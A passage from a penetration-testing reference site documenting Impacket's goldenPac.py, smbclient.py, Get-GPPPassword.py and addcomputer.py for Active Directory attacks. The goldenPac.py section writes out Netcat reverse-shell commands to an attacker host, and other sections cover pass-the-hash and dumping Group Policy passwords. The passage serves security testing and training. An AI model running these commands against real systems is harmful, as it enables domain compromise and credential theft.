be prepended with a colon (`:`). * `-dc-ip`: IP address of the domain controller. If omitted, the positional argument's domain part will be used (in that case, it must be a Fully-Qualified-Domain-Name (FQDN)). * `-debug`: with this flag set, the utility will be more verbose and will possibly print useful information for debug purposes. With this flag set, the utility will also print tracebacks. * `-ts`: with this flag set, the utility will prepend all output with a timestamp. [](https://tools.thehacker.recipes/impacket/examples/goldenpac.py#specificities) Specificities --------------------------------------------------------------------------------------------------- It also has the following specific command line arguments: * positional argument #2: command to execute on the target system (e.g. `whoami` or `'powershell -c "nc.exe attacker_ip listener_port -e cmd.exe"'`), or arguments for the uploaded file if the `-c` option is used. If omitted, `cmd.exe` will be executed via `psexec` to open a shell. If `None` is specified, no command will be executed and only the TGT will be saved for later use. * `-target-ip`: IP address of the target machine. If omitted, the positional argument's target part will be used. This argument is useful when NetBIOS name resolution request fail. * `-c`: uploads the specified file on the remote target and executes it with the arguments passed in the positional argument #2. * `-w`: writes the Golden Ticket at the specified path. Useful with `None` specified in the positional argument #2. Copy # with cleartext credentials goldenPac.py 'DOMAIN.LOCAL'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER' # pass-the-hash (with an NT hash) goldenPac.py -hashes :'NThash' 'DOMAIN.LOCAL'/'USER'@'DOMAIN_CONTROLLER' # uploads Netcat and execute a reverse shell goldenPac.py -c ./nc.exe 'DOMAIN.LOCAL'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER' 'attacker_ip listener_port -e cmd.exe' If the -hashes argument is supplied, the utility will be able to use it for [pass-the-hash](https://www.thehacker.recipes/ad/movement/ntlm/pth) when obtaining the Forest SID, when listing Domain Controllers, or use it for [overpass-the-hash](https://www.thehacker.recipes/ad/movement/kerberos/opth) for Kerberos operations. The utility creates a PAC with the following default groups ids: 513, 512, 520, 518, 519. There are scenarios where a ticket with a PAC containing these ids wouldn't be enough (see. [this](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets#practice) ). Also, it could be useful to note that as of November 2021 updates, if the username supplied doesn't exist in Active Directory, the ticket will get rejected. [PreviousGetUserSPNs.py](https://tools.thehacker.recipes/impacket/examples/getuserspns.py) [NextkarmaSMB.py](https://tools.thehacker.recipes/impacket/examples/karmasmb.py) Last updated 3 years ago --- # smbclient.py | The Hacker Tools [smbclient.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbclient.py) can be used to explore remote SMB shares interactively. [](https://tools.thehacker.recipes/impacket/examples/smbclient.py#commons) Commons --------------------------------------------------------------------------------------- It has the following generic command line arguments, similar to many other tools: * required positional argument: `[[domain/]username[:password]@]` or `LOCAL` if the user wants to parse a local file (e.g. `domain.local/user@dc01`, `domain/user:[[email protected]](https://tools.thehacker.recipes/cdn-cgi/l/email-protection) `). ![](https://tools.thehacker.recipes/~gitbook/image?url=https%3A%2F%2F894632015-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MiRT0QHotSpofwDFs_w%252Fuploads%252FUHsmBiqakwXP7RLGzQzd%252Fimpacket_positional_arg-with%2520target.png%3Falt%3Dmedia%26token%3D93400849-4096-40c2-8f07-0a17747c6551&width=768&dpr=4&quality=100&sign=11c7227e&sv=2) required positional argument format * `-hashes`: the LM and/or NT hash to use for a [pass-the-hash](https://www.thehacker.recipes/ad/movement/ntlm/pth) (NTLM). The format is as follows: `[LMhash]:NThash` (the LM hash is optional, the NT hash must be prepended with a colon (`:`). * `-aesKey`: the AES128 or AES256 hexadecimal long-term key to use for a [pass-the-key](https://www.thehacker.recipes/ad/movement/kerberos/ptk) authentication (Kerberos). * `-k`: this flag must be set when authenticating using Kerberos. The utility will try to grab credentials from a Ccache file which path must be set in the `KRB5CCNAME` environment variable. In this case, the utility will do [pass-the-cache](https://www.thehacker.recipes/ad/movement/kerberos/ptc) . If valid credentials cannot be found or if the `KRB5CCNAME` variable is not or wrongly set, the utility will use the password specified in the positional argument for plaintext Kerberos authentication, or the NT hash (i.e. RC4 long-term key) in the `-hashes` argument for [overpass-the-hash](https://www.thehacker.recipes/ad/movement/kerberos/opth) . A Kirbi file could also be converted to a Ccache file using [ticketConverter.py](https://tools.thehacker.recipes/impacket/examples/ticketconverter.py) in order to be used by the utility (indirect [pass-the-ticket](https://www.thehacker.recipes/ad/movement/kerberos/ptt) ). * `-no-pass`: this flag must be set when an empty password will by used, or no password at all. Without this flag, the user will be prompted for a password when running the utility. This flag is especially useful when using `-k`. * `-dc-ip`: IP address of the domain controller. If omitted, the positional argument's domain part will be used (it must be a Fully-Qualified-Domain-Name (FQDN) though). * `-debug`: with this flag set, the utility will be more verbose and will possibly print useful information for debug purposes. With this flag set, the utility will also print tracebacks. [](https://tools.thehacker.recipes/impacket/examples/smbclient.py#specificities) Specificities --------------------------------------------------------------------------------------------------- * `-target-ip`: IP adress of the target machine. If omitted, the positional argument's target part will be used. This argument is useful when NetBIOS name resolution request fail. * `-port`: remote TCP port the utility must connect to. By default, the port is set to 445 since SMB is the protocol used. * `-file`: input file with commands to execute in the mini shell name of the SMB share to search GPP passwords in. By default, this is set to `SYSVOL`. Copy # (usage example on a domain controller) smbclient.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER' [](https://tools.thehacker.recipes/impacket/examples/smbclient.py#mini-shell) Mini-shell --------------------------------------------------------------------------------------------- Once the interactive SMB shell (a.k.a. minishell) is opened, many cmdlets can be used (non-exhaustive list below): * `shares`: list available shares. * `use`: connect to a specific share. * `ls`: list all the files and directories in the current directory. * `cd DIR`: change the current directory to. * `pwd`: show the current directory. * `rm FILE`: remove a file. The name of the file to remove is expected for this argument. * `mkdir DIR`: create a directory under the current path. * `rmdir DIR`: remove a directory under the current path. * `put FILE`: upload a file into the current path. * `get FILE`: downloads a file from the current path. * `mget MASK`: download all files from the current directory matching the provided mask. * `cat FILE`: read the file from the current path. * `mount TARGET PATH`: create a mount point from PATH to TARGET (local admin privileges required). * `umount PATH`: removes the mount point at {path} without deleting the directory (local admin privileges required). * `list_snapshots PATH`: lists the vss snapshots for the specified path. * `info`: returns NetrServerInfo main results. * `who`: returns the sessions currently connected at the target host (local admin privileges required). * `exit`: terminates the server process (and this session). * `password`: change the user password, the new password will be prompted for input. Copy Type help for list of commands # shares ADMIN$ C$ IPC$ NETLOGON SYSVOL # use SYSVOL # ls drw-rw-rw- 0 Fri Jul 2 15:11:14 2021 . drw-rw-rw- 0 Fri Jul 2 15:11:14 2021 .. drw-rw-rw- 0 Fri Jul 2 15:11:14 2021 domain.local # cd domain.local # cat domain.local/Policies/{A5C8C37E-9A32-4EA4-AF76-6C094C0117E9}/Machine/Microsoft/Windows NT/SecEdit/GptTmpl.inf [Unicode] Unicode=yes [Version] signature="$CHICAGO$" Revision=1 [Group Membership] *S-1-5-21-1170647656-860703057-891382899-1105__Memberof = *S-1-5-32-544 *S-1-5-21-1170647656-860703057-891382899-1105__Members = # exit [Previousservices.py](https://tools.thehacker.recipes/impacket/examples/services.py) [Nextsmbexec.py](https://tools.thehacker.recipes/impacket/examples/smbexec.py) Last updated 3 years ago --- # Get-GPPPassword.py | The Hacker Tools [Get-GPPPassword.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/Get-GPPPassword.py) can be to used [dump Group Policy Preferences passwords](https://www.thehacker.recipes/ad/movement/credentials/dumping/group-policies-preferences) . Unlike other similar tools, this utility doesn't mount the remote `SYSVOL` share from the DC, it uses streams instead to navigate the share and carve file contents. [](https://tools.thehacker.recipes/impacket/examples/get-gpppassword.py#commons) Commons --------------------------------------------------------------------------------------------- It has the following generic command line arguments, similar to many other tools: * required positional argument: `[[domain/]username[:password]@]` or `LOCAL` if the user wants to parse a local file (e.g. `domain.local/user@dc01`, `domain/user:[[email protected]](https://tools.thehacker.recipes/cdn-cgi/l/email-protection) `). ![](https://tools.thehacker.recipes/~gitbook/image?url=https%3A%2F%2F894632015-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MiRT0QHotSpofwDFs_w%252Fuploads%252FUHsmBiqakwXP7RLGzQzd%252Fimpacket_positional_arg-with%2520target.png%3Falt%3Dmedia%26token%3D93400849-4096-40c2-8f07-0a17747c6551&width=768&dpr=4&quality=100&sign=11c7227e&sv=2) required positional argument format * `-hashes`: the LM and/or NT hash to use for a [pass-the-hash](https://www.thehacker.recipes/ad/movement/ntlm/pth) (NTLM). The format is as follows: `[LMhash]:NThash` (the LM hash is optional, the NT hash must be prepended with a colon (`:`). * `-aesKey`: the AES128 or AES256 hexadecimal long-term key to use for a [pass-the-key](https://www.thehacker.recipes/ad/movement/kerberos/ptk) authentication (Kerberos). * `-k`: this flag must be set when authenticating using Kerberos. The utility will try to grab credentials from a Ccache file which path must be set in the `KRB5CCNAME` environment variable. In this case, the utility will do [pass-the-cache](https://www.thehacker.recipes/ad/movement/kerberos/ptc) . If valid credentials cannot be found or if the `KRB5CCNAME` variable is not or wrongly set, the utility will use the password specified in the positional argument for plaintext Kerberos authentication, or the NT hash (i.e. RC4 long-term key) in the `-hashes` argument for [overpass-the-hash](https://www.thehacker.recipes/ad/movement/kerberos/opth) . A Kirbi file could also be converted to a Ccache file using [ticketConverter.py](https://tools.thehacker.recipes/impacket/examples/ticketconverter.py) in order to be used by the utility (indirect [pass-the-ticket](https://www.thehacker.recipes/ad/movement/kerberos/ptt) ). * `-no-pass`: this flag must be set when an empty password will by used, or no password at all. Without this flag, the user will be prompted for a password when running the utility. This flag is especially useful when using `-k`. * `-dc-ip`: IP address of the domain controller. If omitted, the positional argument's domain part will be used (in that case, it must be a Fully-Qualified-Domain-Name (FQDN)). * `-debug`: with this flag set, the utility will be more verbose and will possibly print useful information for debug purposes. With this flag set, the utility will also print tracebacks. * `-ts`: with this flag set, the utility will prepend all output with a timestamp. [](https://tools.thehacker.recipes/impacket/examples/get-gpppassword.py#specificities) Specificities --------------------------------------------------------------------------------------------------------- It also has the following specific command line arguments: * `-target-ip`: IP address of the target machine. If omitted, the positional argument's target part will be used. This argument is useful when NetBIOS name resolution request fail. * `-port`: remote TCP port the utility must connect to. By default, the port is set to 445 since SMB is the protocol used. * `-xmlfile`: the path to the local .xml file to parse * `-share`: the name of the SMB share to search GPP passwords in. By default, this is set to `SYSVOL`. * `-base-dir`: the directory to search in. By default, this is set to `/`. With a default value in -share, it makes the utility start the search in `\\target\SYSVOL\`. Copy # with a NULL session Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER' # with cleartext credentials Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER' # pass-the-hash (with an NT hash) Get-GPPPassword.py -hashes :'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER' # parse a local file Get-GPPPassword.py -xmlfile '/path/to/Policy.xml' 'LOCAL' [PreviousgetArch.py](https://tools.thehacker.recipes/impacket/examples/getarch.py) [NextGetNPUsers.py](https://tools.thehacker.recipes/impacket/examples/getnpusers.py) Last updated 3 years ago --- # addcomputer.py | The Hacker Tools [addcomputer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py) can be to used to add a new computer account in the Active Directory, using the credentials of a domain user. This is usually done when the [MachineAccountQuota](https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota) domain-level attribute is set higher than 0 (set to 10 by default), allowing for standard domain users to create and join machine accounts. Alternatively,if the MachineAccountQuota is 0, the utility can still be used if the credentials used match a powerful enough account (e.g. domain administrator). The utility can be also used to remove a computer account or change its password if the proper rights are validated. [](https://tools.thehacker.recipes/impacket/examples/addcomputer.py#commons) Commons ----------------------------------------------------------------------------------------- It has the following generic command line arguments, similar to many other tools: * required positional argument: `[domain/]username[:password]` (e.g. `domain.local/user`, `domain/user:password`). ![](https://tools.thehacker.recipes/~gitbook/image?url=https%3A%2F%2F894632015-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MiRT0QHotSpofwDFs_w%252Fuploads%252FZOGpF6lFdismhYLUOkqv%252Fimpacket_positional_arg-without%2520target.png%3Falt%3Dmedia%26token%3D1c309cbd-9dca-4c83-beb3-a81f3ea34c29&width=768&dpr=4&quality=100&sign=737bfe40&sv=2) * `-hashes`: the LM and/or NT hash to use for a [pass-the-hash](https://www.thehacker.recipes/ad/movement/ntlm/pth) (NTLM). The format is as follows: `[LMhash]:NThash` (the LM hash is optional, the NT hash must be prepended with a colon (`:`). * `-aesKey`: the AES128 or AES256 hexadecimal long-term key to use for a [pass-the-key](https://www.thehacker.recipes/ad/movement/kerberos/ptk) authentication (Kerberos). * `-k`: this flag must be set when authenticating using Kerberos. The utility will try to grab credentials from a Ccache file which path must be set in the `KRB5CCNAME` environment variable. In this case, the utility will do [pass-the-cache](https://www.thehacker.recipes/ad/movement/kerberos/ptc) . If valid credentials cannot be found or if the `KRB5CCNAME` variable is not or wrongly set, the utility will use the password specified in the positional argument for plaintext Kerberos authentication, or the NT hash (i.e. RC4 long-term key) in the `-hashes` argument for [overpass-the-hash](https://www.thehacker.recipes/ad/movement/kerberos/opth) . A Kirbi file could also be converted to a Ccache file using [ticketConverter.py](https://tools.thehacker.recipes/impacket/examples/ticketconverter.py) in order to be used by the utility (indirect [pass-the-ticket](https://www.thehacker.recipes/ad/movement/kerberos/ptt) ). * `-no-pass`: this flag must be set when an empty password will by used, or no password at all. Without this flag, the user will be prompted for a password when running the utility. This flag is especially useful when using `-k`. * `-dc-ip`: IP address of the domain controller. If omitted, the positional argument's domain part will be used (in that case, it must be a Fully-Qualified-Domain-Name (FQDN)). * `-debug`: with this flag set, the utility will be more verbose and will possibly print useful information for debug purposes. With this flag set, the utility will also print tracebacks. [](https://tools.thehacker.recipes/impacket/examples/addcomputer.py#specificities) Specificities ----------------------------------------------------------------------------------------------------- It also has the following specific command line arguments: * `-dc-host` : hostname of the domain controller. If omitted, the positional argument's domain part will be used (in that case, it must be a Fully-Qualified-Domain-Name (FQDN)). * `-domain-netbios`: the domain's NetBIOS name where the new computer account will be added. This argument is especially useful when the target forest handles multiple domains. * `-baseDN`: the distinguished name base in LDAP. If omitted, the positional argument's domain part will be used (in that case, it must be a Fully-Qualified-Domain-Name (FQDN)). * `-method`: the method to add the new computer account. It can be SAMR to add the account via SMB or LDAPS (default to SAMR). 💡_Nota bene: if the chosen method is SAMR, the account will be created without SPNs (Service Principal Names)._ * `-port`: the destination port to connect to. It can be 139, 445 or 636. SAMR defaults to 445, LDAPS to 636. * `-computer-name`: the name of the new computer account. If omitted, a random `DESKTOP-[A-Z0-9]{8}` name will be used. * `-computer-pass`: password of the new computer account. If omitted, a random `[A-Za-z0-9]{32}` password will be used. The password will be printed if the computer creation succeeds. * `-computer-group`: the group to which the new account will be added, with the LDAP path format. If omitted, `CN=Computers` will be used. * `-no-add`: only changes the specified computer account password without adding a new one. * `-delete`: deletes an existing computer account. Copy # Add a computer account addcomputer.py -computer-name 'COMPUTER$' -computer-pass 'SomePassword' -dc-host $DomainController -domain-netbios $DOMAIN 'DOMAIN\user:password' # Modify a computer account password addcomputer.py -computer-name 'COMPUTER$' -computer-pass 'SomePassword' -dc-host $DomainController -no-add 'DOMAIN\user:password' # Delete a computer account addcomputer.py -computer-name 'COMPUTER$' -dc-host $DomainController -delete 'DOMAIN\user:password' When using addcomputer.py for the creation of a computer account, the "SAMR" method is used by default (instead of the LDAPS one). At the time of writing (10th of December, 2021), the SAMR method creates the account without SPNs. [PreviousScript examples](https://tools.thehacker.recipes/impacket/examples) [Nextatexec.py](https://tools.thehacker.recipes/impacket/examples/atexec.py) Last updated 3 years ago --- # Email Protection | Cloudflare Please enable cookies. Email Protection ================ You are unable to access this email address tools.thehacker.recipes ------------------------------------------------------------------- The website from which you got to this page is protected by Cloudflare. Email addresses on that page have been hidden in order to keep them from being accessed by malicious bots. **You must enable Javascript in your browser in order to decode the e-mail address**. If you have a website and are interested in protecting it in a similar way, you can [sign up for Cloudflare](https://www.cloudflare.com/sign-up?utm_source=email_protection) . * [How does Cloudflare protect email addresses on website from spammers?](https://developers.cloudflare.com/waf/tools/scrape-shield/email-address-obfuscation/) * [Can I sign up for Cloudflare?](https://developers.cloudflare.com/fundamentals/setup/account/create-account/) Cloudflare Ray ID: **99e9b9d7fa5dd46b** • Your IP: Click to reveal 54.237.218.47 • Performance & security by [Cloudflare](https://www.cloudflare.com/5xx-error-landing) ---